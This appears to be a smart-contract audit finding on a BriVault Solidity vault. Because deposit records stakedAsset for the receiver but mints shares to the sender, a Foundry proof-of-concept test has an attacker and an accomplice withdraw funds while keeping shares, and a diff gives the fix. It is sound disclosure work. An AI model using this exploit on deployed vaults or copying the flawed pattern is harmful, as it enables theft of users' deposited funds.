function deposit(uint256 assets, address receiver) public override returns (uint256) {
require(receiver != address(0));
if (block.timestamp >= eventStartDate) {
revert eventStarted();
}
uint256 fee = _getParticipationFee(assets);
if (minimumAmount + fee > assets) {
revert lowFeeAndAmount();
}
uint256 stakeAsset = assets - fee;
@> stakedAsset[receiver] = stakeAsset;
uint256 participantShares = _convertToShares(stakeAsset);
IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
@> _mint(msg.sender, participantShares);
emit deposited (receiver, stakeAsset);
return participantShares;
}
function cancelParticipation () public {
if (block.timestamp >= eventStartDate){
revert eventStarted();
}
@> uint256 refundAmount = stakedAsset[msg.sender];
stakedAsset[msg.sender] = 0;
@> uint256 shares = balanceOf(msg.sender);
@> _burn(msg.sender, shares);
@> IERC20(asset()).safeTransfer(msg.sender, refundAmount);
}
pragma solidity ^0.8.24;
import {Test, console} from "forge-std/Test.sol";
import {BriVault} from "../src/BriVault.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/token/ERC20Mock.sol";
contract VaultTheftTest is Test {
BriVault public vault;
ERC20Mock public asset;
address public owner = makeAddr("owner");
address public feeAddress = makeAddr("feeAddress");
address public attacker = makeAddr("attacker");
address public bob = makeAddr("bob");
function setUp() public {
asset = new ERC20Mock();
vm.startPrank(owner);
vault = new BriVault(
asset,
300,
block.timestamp + 1 days,
feeAddress,
10 * 10**18,
block.timestamp + 30 days
);
string[48] memory countries;
countries[0] = "Team A";
vault.setCountry(countries);
vm.stopPrank();
address legitimateUser = makeAddr("legitimateUser");
asset.mint(legitimateUser, 1000 * 10**18);
vm.startPrank(legitimateUser);
asset.approve(address(vault), type(uint256).max);
vault.deposit(1000 * 10**18, legitimateUser);
vm.stopPrank();
asset.mint(attacker, 100 * 10**18);
}
function testTheftViaReceiverMismatch() public {
uint256 vaultBalanceBefore = asset.balanceOf(address(vault));
uint256 totalSharesBefore = vault.totalSupply();
vm.startPrank(attacker);
asset.approve(address(vault), 100 * 10**18);
vault.deposit(100 * 10**18, bob);
vm.stopPrank();
assertEq(vault.stakedAsset(bob), 97 * 10**18, "Bob credited with stakedAsset");
assertEq(vault.balanceOf(bob), 0, "Bob has no shares");
assertEq(vault.balanceOf(attacker), 97 * 10**18, "Attacker has shares");
vm.prank(bob);
vault.cancelParticipation();
assertEq(asset.balanceOf(bob), 97 * 10**18, "Bob stole 97 tokens");
assertEq(vault.balanceOf(attacker), 97 * 10**18, "Attacker keeps shares");
uint256 vaultBalanceAfter = asset.balanceOf(address(vault));
uint256 totalSharesAfter = vault.totalSupply();
assertEq(vaultBalanceAfter, vaultBalanceBefore, "Vault back to initial balance");
assertEq(totalSharesAfter, totalSharesBefore + 97 * 10**18, "But shares increased");
assertGt(totalSharesAfter, vaultBalanceAfter, "UNDERCOLLATERALIZED");
}
}
function deposit(uint256 assets, address receiver) public override returns (uint256) {
require(receiver != address(0));
if (block.timestamp >= eventStartDate) {
revert eventStarted();
}
uint256 fee = _getParticipationFee(assets);
if (minimumAmount + fee > assets) {
revert lowFeeAndAmount();
}
uint256 stakeAsset = assets - fee;
- stakedAsset[receiver] = stakeAsset;
+ stakedAsset[msg.sender] = stakeAsset;
uint256 participantShares = _convertToShares(stakeAsset);
IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
_mint(msg.sender, participantShares);
- emit deposited (receiver, stakeAsset);
+ emit deposited (msg.sender, stakeAsset);
return participantShares;
}